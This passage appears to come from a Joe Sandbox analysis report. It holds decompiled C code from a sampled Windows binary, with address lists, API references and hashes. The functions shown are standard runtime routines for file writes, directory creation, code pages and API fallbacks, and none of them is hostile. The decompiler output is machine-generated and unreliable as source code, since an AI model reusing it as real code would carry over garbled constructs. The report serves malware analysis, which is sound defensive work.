				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x1a)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t65 = _t49 + 0x24;
									if(E00066E18(0xa0f50, _t49 + 0x24, 0) == 0) {
										E00067061(0xa0f50, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0x93260(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0x93260(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}

0x00069f2f
0x00069f33
0x00069f37
0x00069f3b
0x00069f48
0x00069f52
0x00069f52
0x00069f57
0x00069f5c
0x00069f5c
0x00069f65
0x00069f6a
0x00069fb8
0x00069fc1
0x00069fc3
0x00069fc5
0x00069fc9
0x00069fcb
0x0006a03e
0x0006a043
0x00000000
0x0006a047
0x00069fcd
0x00069fd1
0x00000000
0x00069fd9
0x00069fdb
0x00069feb
0x0006a039
0x00000000
0x0006a039
0x00000000
0x00069feb
0x00069fd1
0x00069f6c
0x00069f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00069f72
0x00069f72
0x00069f74
0x00069f78
0x00069f7a
0x00069f7a
0x00069f8e
0x00069f97
0x00069f99
0x00069f9b
0x00069f9f
0x00000000
0x00000000
0x00069fa1
0x00069fa5
0x00000000
0x00000000
0x00000000
0x00069fa7
0x00000000
0x00069fed
0x00069fed
0x0006a002
0x0006a00b
0x0006a013
0x0006a01c
0x0006a021
0x0006a029
0x0006a029
0x00069f57
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0006CC94,00000001,?,?,?,00000000,00074ECD,?,?,?), ref: 00069F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00074ECD,?,?,?,?,?,00074972,?), ref: 00069F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0006CC94,00000001,?,?), ref: 00069FB8

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 13ac9e231425fa302266db7760c82519871289824dd2979097264decdf5688d5
Instruction ID: faf64ff8310f25b0e7f97cb273fde95e28ba4eac2a08617130f805fe360c34e6
Opcode Fuzzy Hash: 13ac9e231425fa302266db7760c82519871289824dd2979097264decdf5688d5
Instruction Fuzzy Hash: 623102312083059BEF209F24D848B6BBBEAEB91710F054529F945EB691C775DC48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0006A207 Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0006A207(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0007E360();
				_t21 = _a4;
				_t8 =  *(E0006BC69(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E0006A180(_t21) != 0 || E0006B66C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0006A444(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x0006a20f
0x0006a215
0x0006a21e
0x0006a224
0x0006a238
0x0006a240
0x0006a27e
0x0006a284
0x0006a287
0x0006a293
0x0006a295
0x0006a289
0x0006a289
0x0006a28c
0x00000000
0x0006a28e
0x0006a290
0x0006a290
0x0006a28c
0x00000000
0x00000000
0x00000000
0x0006a22b
0x0006a22e
0x0006a236
0x0006a26b
0x0006a26f
0x0006a275
0x0006a275
0x0006a27a
0x00000000
0x00000000
0x00000000
0x0006a236
0x0006a29a

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A261
GetLastError.KERNEL32(?,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A27E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: d43c75cbc9756b76f00f8ae8c2db1f643811f803a0a4989cb39ff274d71f4151
Instruction ID: 8fc5e6c231657cfc720fd0dab8c1e563c8fb9f0761decc2035b3d283bd0f53c7
Opcode Fuzzy Hash: d43c75cbc9756b76f00f8ae8c2db1f643811f803a0a4989cb39ff274d71f4151
Instruction Fuzzy Hash: EA01D63138111566DF71BB694C55BEE338AAF0B741F044451F805F5052D759CA80CEA3

Uniqueness

Uniqueness Score: -1.00%

Function 0008AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0008AFF4(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x9e668; // 0x136d1c5
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x8b646
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x8b646
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E0008C099(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x7d8b57fc
					E0008A275(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x7d8b57fc
					E0008A275(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0007EC4A(_v8 ^ _t102);
			}

0x0008aff4
0x0008afff
0x0008b006
0x0008b00b
0x0008b016
0x0008b028
0x0008b120
0x0008b120
0x0008b126
0x0008b128
0x0008b129
0x0008b129
0x0008b12b
0x0008b131
0x0008b131
0x0008b133
0x0008b135
0x0008b13e
0x0008b141
0x0008b14d
0x0008b154
0x0008b164
0x0008b156
0x0008b156
0x0008b159
0x0008b159
0x0008b159
0x0008b15d
0x0008b15d
0x00000000
0x0008b15d
0x0008b143
0x0008b143
0x0008b148
0x0008b148
0x0008b160
0x0008b160
0x0008b160
0x0008b166
0x0008b16c
0x0008b16c
0x0008b172
0x0008b173
0x0008b173
0x0008b02e
0x0008b02e
0x0008b030
0x0008b030
0x0008b037
0x0008b038
0x0008b03c
0x0008b042
0x0008b048
0x0008b070
0x0008b070
0x0008b072
0x00000000
0x00000000
0x0008b051
0x0008b055
0x0008b067
0x0008b067
0x0008b069
0x00000000
0x00000000
0x0008b05a
0x0008b05c
0x0008b05e
0x0008b066
0x0008b066
0x00000000
0x0008b066
0x00000000
0x0008b05c
0x0008b06b
0x0008b06b
0x0008b06e
0x0008b06e
0x0008b075
0x0008b08a
0x0008b090
0x0008b0a4
0x0008b0ab
0x0008b0ba
0x0008b0cc
0x0008b0d3
0x0008b0db
0x0008b0dd
0x0008b0dd
0x0008b0e7
0x0008b0f7
0x0008b0f9
0x0008b110
0x0008b0fb
0x0008b0fb
0x0008b0fb
0x0008b0fb
0x0008b100
0x00000000
0x0008b100
0x0008b0e9
0x0008b0e9
0x0008b0ee
0x0008b107
0x0008b107
0x0008b107
0x0008b117
0x0008b118
0x0008b11c
0x0008b187

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0008B019

Strings

, xrefs: 0008B05E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3057ecaf6aa0f3c9eb57f759f3817720c5e673f4fbd2d85e066269aea3c97f31
Instruction ID: 1c864bf9a2b7a60a804b78d18985a8530b27bf3fa4a5b19b47d302f2c45e44ae
Opcode Fuzzy Hash: 3057ecaf6aa0f3c9eb57f759f3817720c5e673f4fbd2d85e066269aea3c97f31
Instruction Fuzzy Hash: F541067050438C9ADF329A68CC98AFBBBE9FB55704F5404EDE5DA8B142D3359A45CF20

Uniqueness

Uniqueness Score: -1.00%

Function 0008A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E0008A72C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x9e668; // 0x136d1c5
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E0008A458(0x16, "LCMapStringEx", 0x97374, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E0008A7B4(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x93260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0007EC4A(_v8 ^ _t33);
			}

0x0008a72c
0x0008a731
0x0008a732
0x0008a739
0x0008a73c
0x0008a74e
0x0008a753
0x0008a75a
0x0008a79d
0x0008a75c
0x0008a779
0x0008a77f
0x0008a77f
0x0008a7b1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0008A79D

Strings

LCMapStringEx, xrefs: 0008A73D, 0008A747

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: f79a0324aea3bb10ef169e706f6e5fecc112a5e8482ce50901268da8cc7a5e54
Instruction ID: 346d99ebd9592e5ac84350486babad98add157018b89f8a2bdc0c225d92b3495
Opcode Fuzzy Hash: f79a0324aea3bb10ef169e706f6e5fecc112a5e8482ce50901268da8cc7a5e54
Instruction Fuzzy Hash: B9011372604208BBDF06AFA0DC06DEE3F66FF09760F048155FE1825161CA368A31BB91

Uniqueness

Uniqueness Score: -1.00%

Function 0008A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0008A6CA(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x9e668; // 0x136d1c5
				_v8 = _t8 ^ _t22;
				_t10 = E0008A458(0x14, "InitializeCriticalSectionEx", 0x9736c, 0x97374); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x93260(_a4, _a8, _a12);
					 *_t20();
				}
				return E0007EC4A(_v8 ^ _t22);
			}

0x0008a6cf
0x0008a6d0
0x0008a6d7
0x0008a6ec
0x0008a6f1
0x0008a6f8
0x0008a715
0x0008a6fa
0x0008a705
0x0008a70b
0x0008a70b
0x0008a729

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00089D2F), ref: 0008A715

Strings

InitializeCriticalSectionEx, xrefs: 0008A6E5

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 39a1e003d9ac2353a8966d52af78d58831076fbf9f7dfdd3f2170e342f797851
Instruction ID: 92ff27c11cd3ab367e0a9678fe2e11d6ebb3ac6993230d9971763c373d075bc1
Opcode Fuzzy Hash: 39a1e003d9ac2353a8966d52af78d58831076fbf9f7dfdd3f2170e342f797851
Instruction Fuzzy Hash: EAF0E231B4520CBBDF116F60CC06CAE7FA1FF49760B008066FD191A2A1DA724E10FB91

Uniqueness

Uniqueness Score: -1.00%

Function 0008A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0008A56F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x9e668; // 0x136d1c5
				_v8 = _t4 ^ _t18;
				_t6 = E0008A458(3, "FlsAlloc", 0x97330, 0x97338); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x93260(_a4);
					 *_t16();
				}
				return E0007EC4A(_v8 ^ _t18);
			}

0x0008a574
0x0008a575
0x0008a57c
0x0008a591
0x0008a596
0x0008a59d
0x0008a5ae
0x0008a59f
0x0008a5a4
0x0008a5aa
0x0008a5aa
0x0008a5c2

APIs

TlsAlloc.KERNEL32 ref: 0008A5AE

Strings

FlsAlloc, xrefs: 0008A58A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 30105a9713d12f78441b3c166c7798d4dd4c94312c601eccc691ef8980cc7578
Instruction ID: 67a3054d4dd7c93320d41a89fe429b9023b768b4b8c3842b19bc9c91bab3cc40
Opcode Fuzzy Hash: 30105a9713d12f78441b3c166c7798d4dd4c94312c601eccc691ef8980cc7578
Instruction Fuzzy Hash: 96E05531B452287BAA21BB60CC028AEBBA0EB16B20B404157FD081B280DE740F01A7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0008329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0008329A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00083179(4, "FlsAlloc", 0x95684, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0007ECF0();
				return  *_t6(_a4);
			}

0x000832af
0x000832b4
0x000832bb
0x000832ce
0x000832ce
0x000832c2
0x000832cb

APIs

try_get_function.LIBVCRUNTIME ref: 000832AF

Strings

FlsAlloc, xrefs: 0008329E, 000832A8

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: d4aae824e931e360f4d514e0ec768679ac9ca76d4b213bd55f6d63e610b1e1e0
Instruction ID: 167e2cf013ad673a429b11f192dde16ef2c369defb57bb3754c89c10643f8b01
Opcode Fuzzy Hash: d4aae824e931e360f4d514e0ec768679ac9ca76d4b213bd55f6d63e610b1e1e0
Instruction Fuzzy Hash: 01D02B327816346A991232C26C039EE7E449701FB7F450152FF0C1F183C565450113C9

Uniqueness

Uniqueness Score: -1.00%

Function 0008B350 Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0008B350(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x9e668; // 0x136d1c5
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E0008AF1B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x9e828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x9e828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xc16cc - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0008AF8E(_t98);
												goto L37;
											}
										} else {
											E0007F350(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E0008AEDD( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0008AFF4(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0007F350(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x9e838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x9e820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
